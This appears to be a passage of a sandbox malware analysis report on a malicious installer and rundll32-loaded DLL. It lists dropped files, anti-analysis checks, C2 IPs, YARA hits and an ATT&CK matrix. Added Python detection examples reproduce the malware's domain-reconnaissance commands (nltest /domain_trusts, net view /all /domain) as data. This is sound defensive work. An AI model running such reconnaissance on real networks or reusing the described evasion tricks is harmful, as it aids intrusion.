                      Source: C:\Windows\System32\rundll32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,6_2_000001FB3AB77FA8
                      Source: C:\Windows\System32\rundll32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,7_2_0000024739A468E8
                      Source: C:\Windows\System32\rundll32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,7_2_0000024739A47FA8
                      Source: C:\Windows\System32\rundll32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,8_2_00000210FEA068E8
                      Source: C:\Windows\System32\rundll32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_00000210FEA07FA8
                      Source: C:\Windows\System32\rundll32.exe | Window / User API: threadDelayed 8237
                      Source: C:\Windows\System32\rundll32.exe | Window / User API: threadDelayed 816
                      Source: C:\Windows\System32\rundll32.exe | Window / User API: threadDelayed 946
                      Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: :wtfbbq (copy)
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID529.tmp
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSID719.tmp
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSID69B.tmp
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4D9.tmp
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID509.tmp
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4B9.tmp
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID498.tmp
                      Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3EB.tmp
                      Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll
                      Source: C:\Windows\Installer\MSID8B1.tmp | Check user administrative privileges: GetTokenInformation, graph_5-33713
                      Source: C:\Windows\System32\rundll32.exe | API coverage: 1.6 %
                      Source: C:\Windows\System32\rundll32.exe | API coverage: 8.4 %
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exe TID: 4112 | Thread sleep count: 8237 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 4112 | Thread sleep time: -8237000s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 5248 | Thread sleep count: 816 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 5248 | Thread sleep time: -81600s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 4112 | Thread sleep count: 946 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 4112 | Thread sleep time: -946000s >= -30000s
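The thread-sleep lines above are the output of a stalling heuristic: a thread is flagged when it calls Sleep more than 30 times or when its sleeps add up to 30 s or more, which is why the report prints both a count and a total per thread. The following is an added example, not part of the Joe Sandbox report, that reimplements that heuristic over a constructed Sleep() trace. The trace is built so that threads 4112 and 5248 reproduce the report's figures (8237 calls totalling 8,237,000 ms, 816 calls totalling 81,600 ms); the per-call durations of 1000 ms and 100 ms, the thread id 7788 and the GetTickCount values are assumptions. The last function shows the inverse check a sample can perform around its own Sleep call to notice when a sandbox has shortened it.

```python
"""Sleep-loop heuristic matching the report's thread-sleep lines.
Added example, not from the report. TRACE is constructed so that
TIDs 4112 and 5248 reproduce the report's totals; durations are assumed."""
from collections import defaultdict

SLEEP_COUNT_LIMIT = 30          # report: "Thread sleep count: 8237 > 30"
SLEEP_TOTAL_LIMIT_MS = 30_000   # report: "Thread sleep time: -8237000s >= -30000s"

# Constructed API trace: (thread id, milliseconds passed to Sleep).
TRACE = ([(4112, 1000)] * 8237      # 8237 one-second sleeps -> 8,237,000 ms
         + [(5248, 100)] * 816      # 816 sleeps of 100 ms  ->    81,600 ms
         + [(7788, 50)] * 5)        # assumed benign thread, under both limits


def summarize_sleeps(trace):
    """Per-thread (call count, total milliseconds)."""
    count = defaultdict(int)
    total = defaultdict(int)
    for tid, ms in trace:
        count[tid] += 1
        total[tid] += ms
    return {tid: (count[tid], total[tid]) for tid in count}


def flag_sleep_loops(trace, count_limit=SLEEP_COUNT_LIMIT, total_limit_ms=SLEEP_TOTAL_LIMIT_MS):
    """Threads whose Sleep usage looks like stalling rather than ordinary waiting.
    Either threshold on its own is enough to flag a thread."""
    findings = []
    for tid, (calls, total_ms) in summarize_sleeps(trace).items():
        reasons = []
        if calls > count_limit:
            reasons.append(f"sleep count {calls} > {count_limit}")
        if total_ms >= total_limit_ms:
            reasons.append(f"sleep time {total_ms} ms >= {total_limit_ms} ms")
        if reasons:
            findings.append({"tid": tid, "calls": calls, "total_ms": total_ms, "reasons": reasons})
    return findings


def sleep_was_shortened(requested_ms, tick_before, tick_after, tolerance=0.1):
    """The sample-side check: GetTickCount before and after Sleep(requested_ms).
    If far less wall-clock time passed than requested, the sleep was skipped
    or accelerated by the analysis environment. GetTickCount is a 32-bit
    millisecond counter, so the difference is taken modulo 2**32."""
    elapsed = (tick_after - tick_before) & 0xFFFFFFFF
    return elapsed < requested_ms * (1 - tolerance)


if __name__ == "__main__":
    for f in flag_sleep_loops(TRACE):
        print(f"TID {f['tid']}: " + "; ".join(f["reasons"]))
    print("1 s sleep shortened:", sleep_was_shortened(1000, 100_000, 100_010))
```

The count threshold matters as much as the total: a sample that sleeps 100 ms in a tight loop never trips a single long-sleep rule, which is exactly the 816-call pattern on TID 5248 above. Note that the GetTickCount, Sleep, GetTickCount sequence in function 6_2_0000000180049AEC earlier in this report sits between StartServiceW and QueryServiceStatus, which is the shape of a poll-with-timeout loop waiting for a service to start, so that one sequence on its own is not evidence of tick-based sleep-skip detection.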
                      Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view /all /domain (2 occurrences)
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (5 occurrences)
                      Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation (7 occurrences)
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B5AF79 FindFirstFileExW,5_2_00B5AF79
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001FB3AB7A350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_000001FB3AB7A350
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001FB3AB71A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_000001FB3AB71A08
                      Source: C:\Windows\System32\rundll32.exe | Code function: 7_2_0000024739A4A350 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0000024739A4A350
                      Source: C:\Windows\System32\rundll32.exe | Code function: 7_2_0000024739A41A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_0000024739A41A08
                      Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00000210FEA0A350 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_00000210FEA0A350
                      Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00000210FEA01A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_00000210FEA01A08
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739A88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
                      Source: rundll32.exe, 00000007.00000003.3200350559.0000024739B18000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3200350559.0000024739AEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B18000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739AE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739A88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000007.00000002.3239728503.000002473BAB0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node (3 occurrences)
                      Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B2D0A5 IsDebuggerPresent,OutputDebugStringW,5_2_00B2D0A5
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_0000000180066C3C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,6_2_00000001800033E0
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B52DCC mov ecx, dword ptr fs:[00000030h] 5_2_00B52DCC
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B5AD78 mov eax, dword ptr fs:[00000030h] 5_2_00B5AD78
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B22310 GetProcessHeap,5_2_00B22310
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B433A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B433A8
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B4353F SetUnhandledExceptionFilter,5_2_00B4353F
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B42968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B42968
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B46E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B46E1B
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000180070760
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018006F6E0

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\rundll32.exe | Network Connect: 104.21.46.75 443
                      Source: C:\Windows\System32\rundll32.exe | Network Connect: 172.67.219.28 443
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B252F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,5_2_00B252F0
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c systeminfo
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view /all /domain
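The process-created lines above are the most portable detection on this page: each discovery tool on its own (ipconfig, systeminfo, nltest, net view) is routine on an administered host, but all of them fired within one process tree whose root is rundll32.exe, a DLL host that has no reason to enumerate domain trusts. The following is an added example, not part of the Joe Sandbox report: it walks Sysmon-style process-creation events and reports any script/DLL host under which at least three distinct discovery tools ran. The events are constructed from the lines above; the pids, the rundll32.exe parent pid and the benign explorer.exe chain are assumptions, and the rundll32.exe command line is elided because the rule does not use it.

```python
"""Detect the rundll32 -> cmd /c -> discovery-tool burst from the report.
Added example, not from the report; events are constructed from its
process-created lines. Pids and the explorer.exe control are assumed."""
from collections import defaultdict

# DLL/script hosts that have no legitimate reason to run host or domain discovery.
LOLBIN_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe"}
# Discovery tools seen in the report, with the argument that makes the call interesting
# (None = any invocation counts).
DISCOVERY_TOOLS = {
    "ipconfig.exe": "/all",
    "systeminfo.exe": None,
    "nltest.exe": "/domain_trusts",
    "net.exe": " view",
}


def _evt(pid, ppid, image, cmd):
    return {"pid": pid, "ppid": ppid, "image": image, "cmd": cmd}


S32 = r"C:\Windows\System32"
# Constructed Sysmon EventID 1 style events.
EVENTS = [
    _evt(2624, 4000, rf"{S32}\rundll32.exe", "rundll32.exe"),  # command line elided
    _evt(3001, 2624, rf"{S32}\cmd.exe", "cmd.exe /c ipconfig /all"),
    _evt(3002, 3001, rf"{S32}\ipconfig.exe", "ipconfig /all"),
    _evt(3003, 2624, rf"{S32}\cmd.exe", "cmd.exe /c systeminfo"),
    _evt(3004, 3003, rf"{S32}\systeminfo.exe", "systeminfo"),
    _evt(3005, 2624, rf"{S32}\cmd.exe", "cmd.exe /c nltest /domain_trusts"),
    _evt(3006, 3005, rf"{S32}\nltest.exe", "nltest /domain_trusts"),
    _evt(3007, 2624, rf"{S32}\cmd.exe", "cmd.exe /c nltest /domain_trusts /all_trusts"),
    _evt(3008, 3007, rf"{S32}\nltest.exe", "nltest /domain_trusts /all_trusts"),
    _evt(3009, 2624, rf"{S32}\cmd.exe", "cmd.exe /c net view /all /domain"),
    _evt(3010, 3009, rf"{S32}\net.exe", "net view /all /domain"),
    # Assumed benign control: an interactive shell under explorer.exe running ipconfig.
    _evt(5000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    _evt(5001, 5000, rf"{S32}\cmd.exe", "cmd.exe"),
    _evt(5002, 5001, rf"{S32}\ipconfig.exe", "ipconfig /all"),
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_discovery_bursts(events, min_tools=3, max_hops=2, hosts=LOLBIN_HOSTS):
    """Attribute each discovery command to the nearest LOLBin-host ancestor within
    max_hops parents (cmd /c adds one hop) and report hosts that ran at least
    min_tools distinct tools."""
    by_pid = {e["pid"]: e for e in events}
    per_host = defaultdict(lambda: defaultdict(list))  # host pid -> tool -> command lines
    for e in events:
        tool = image_name(e["image"])
        needle = DISCOVERY_TOOLS.get(tool)
        if tool not in DISCOVERY_TOOLS or (needle and needle not in e["cmd"].lower()):
            continue
        pid = e["ppid"]
        for _ in range(max_hops):
            parent = by_pid.get(pid)
            if parent is None:
                break
            if image_name(parent["image"]) in hosts:
                per_host[parent["pid"]][tool].append(e["cmd"])
                break
            pid = parent["ppid"]
    findings = []
    for host_pid, tools in per_host.items():
        if len(tools) >= min_tools:
            findings.append({
                "host_pid": host_pid,
                "host_image": by_pid[host_pid]["image"],
                "tools": sorted(tools),
                "commands": [c for cmds in tools.values() for c in cmds],
            })
    return findings


if __name__ == "__main__":
    for f in find_discovery_bursts(EVENTS):
        print(f"{f['host_image']} (pid {f['host_pid']}) ran {len(f['tools'])} discovery tools:")
        for c in f["commands"]:
            print("   ", c)
```

Grouping by the host ancestor rather than alerting on each child is what keeps this quiet on administered estates: the explorer.exe chain above runs the same ipconfig /all and produces nothing. The hop limit is deliberate; without it a long-lived rundll32.exe would be blamed for anything its descendants ever ran.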
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,6_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,6_2_0000000180049278
                      Source: 360total.dll.1.dr | Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
                      Source: rundll32.exe | Binary or memory string: Progman
                      Source: rundll32.exe | Binary or memory string: Program manager
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B435A9 cpuid 5_2_00B435A9
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: EnumSystemLocalesW,5_2_00B5E0C6
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: EnumSystemLocalesW,5_2_00B5E1AC
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: EnumSystemLocalesW,5_2_00B57132
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: EnumSystemLocalesW,5_2_00B5E111
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00B5E237
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetLocaleInfoEx,5_2_00B423F8
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetLocaleInfoW,5_2_00B5E48A
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00B5E5B3
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetLocaleInfoW,5_2_00B5E6B9
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetLocaleInfoW,5_2_00B576AF
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00B5E788
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00B5DE24
                      Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
                      Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\ VolumeInformation (10 occurrences)
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B437D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00B437D5
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001FB3AB78AE0 GetUserNameA,wsprintfA,6_2_000001FB3AB78AE0
                      Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B57B1F GetTimeZoneInformation,5_2_00B57B1F
                      Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,6_2_0000000180040CB0
                      Source: C:\Windows\System32\nltest.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: rundll32.exe | Binary or memory string: 360tray.exe
                      Source: rundll32.exe | Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                      Source: rundll32.exe | Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 8.2.rundll32.exe.210fe9f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab70000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab70000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab60000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.210fea00000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.210fe9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a10000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a40000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.210fea00000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.3239304282.0000024739A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.3072398215.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.3001961858.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.2854188056.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.1996565614.000001FB3AB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.3239248195.0000024739A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match | File source: 8.2.rundll32.exe.210fe9f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab70000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab70000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab60000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.210fea00000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.210fe9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.1fb3ab60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a10000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a40000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.24739a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.210fea00000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.3239304282.0000024739A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.3072398215.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.3001961858.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000003.2854188056.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.1996565614.000001FB3AB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.3239248195.0000024739A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
MITRE ATT&CK Matrix (one column per tactic; digits preceding a technique name are the count badges shown in that matrix cell)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | 1 Replication Through Removable Media | 2 Native API | 1 Valid Accounts | 1 DLL Side-Loading | 2 Obfuscated Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Windows Service | 1 Valid Accounts | 1 DLL Side-Loading | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
